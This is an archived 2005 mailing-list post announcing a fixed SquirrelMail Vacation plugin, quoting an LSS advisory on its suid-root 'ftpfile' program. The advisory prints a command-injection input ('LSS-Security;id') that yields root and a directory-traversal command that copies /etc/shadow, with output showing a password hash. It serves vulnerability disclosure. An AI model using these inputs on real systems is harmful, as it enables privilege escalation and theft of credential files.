[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: Squirrelmail vacation v0.15 local root exploit

To: LSS Security <exposed@xxxxxx>
Subject: Re: Squirrelmail vacation v0.15 local root exploit
From: p dont think <pdontthink@xxxxxxxxxxxxxx>
Date: Thu, 03 Feb 2005 20:13:31 -0800

All,

A new release of this plugin that addresses this exploit is now available at:

http://www.squirrelmail.org/plugin_view.php?id=51

Due to the severity of the exploits in prior versions, upgrade is highly recommended. Also, please keep in mind that while the SquirrelMail team takes security very seriously, it cannot take full responsibility for the plethora of third-party plugins, of which this is one. LSS team: pleeeease let us know *before* you are going to make your announcement next time.

- Paul Lesneiwski

                        LSS Security Advisory #LSS-2005-01-03
                               http://security.lss.hr
---

Title : Squirrelmail vacation v0.15 local root exploit Advisory ID : LSS-2005-01-03 Date : 10.01.2005. Advisory URL: : http://security.lss.hr/en/index.php?page=details&ID=LSS-2005-01-03 Impact : Privilege escalation and arbitrary file read Risk level : High Vulnerability type : Local Vendors contacted : No response from vendor

---

===[ Overview

Vacation plugin for Squirrelmail allows UNIX users to set an auto-reply message to incoming email. That is commonly used to notify the sender of the receiver's absence. Vacation plugin specifically uses the Vacation program. Plugin can be downloaded from: http://www.squirrelmail.org/plugins/vacation0.15-1.43a.tar.gz

===[ Vulnerability

Within Squirrelmail Vacation plugin there is suid root program 'ftpfile'. The program is used to access local files in user's home directory. There is a privilege escalation and arbitrary file read vulnerability in ftpfile. Command line arguments are passed to execve() function without checking for meta-characters, therefore making possible execution of commands as root.

[ljuranic@laptop ljuranic]$ id uid=509(ljuranic) gid=513(ljuranic) groups=513(ljuranic) [ljuranic@laptop ljuranic]$ ftpfile 0 root 0 get 0 "LSS-Security;id" /bin/cp: omitting directory `/root/0' uid=0(root) gid=513(ljuranic) groups=513(ljuranic) [ljuranic@laptop ljuranic]$
It is also possible to read restricted files (such as /etc/shadow), since
ftpfile can copy a file from user's home directory to any other
directory without checking file name for directory traversal attack.
$ ftpfile localhost root root get ../../../../etc/shadow ./shadow ./shadow[ljuranic@laptop ljuranic]$ head ./shadow root:$1$Pwqt1daJ$DIe.fhBadNTN6d1br1OGy0:12401:0:99999:7::: bin:*:10929:0:99999:7::: daemon:*:10929:0:99999:7::: lp:*:10929:0:99999:7::: [ljuranic@laptop ljuranic]$

===[ Affected versions

Squirrelmail Vacation v0.15 and previous versions.

===[ Fix

Not available yet.

===[ PoC Exploit

http://security.lss.hr/exploits/

===[ Credits

Credits for this vulnerability goes to Leon Juranic.

===[ LSS Security Contact LSS Security Team, <eXposed by LSS> WWW : http://security.lss.hr E-mail : security@xxxxxx Tel : +385 1 6129 775

Prev by Date: Re: [ RSTACK Public Security Advisory ] Remote DOS against Linksys PSUS4
Next by Date: [SECURITY] [DSA 667-1] New squid packages fix several vulnerabilities
Previous by thread: [SECURITY] [DSA 667-1] New PostgreSQL packages fix arbitrary library loading
Next by thread: [SECURITY] [DSA 667-1] New squid packages fix several vulnerabilities
Index(es):
- Date
- Thread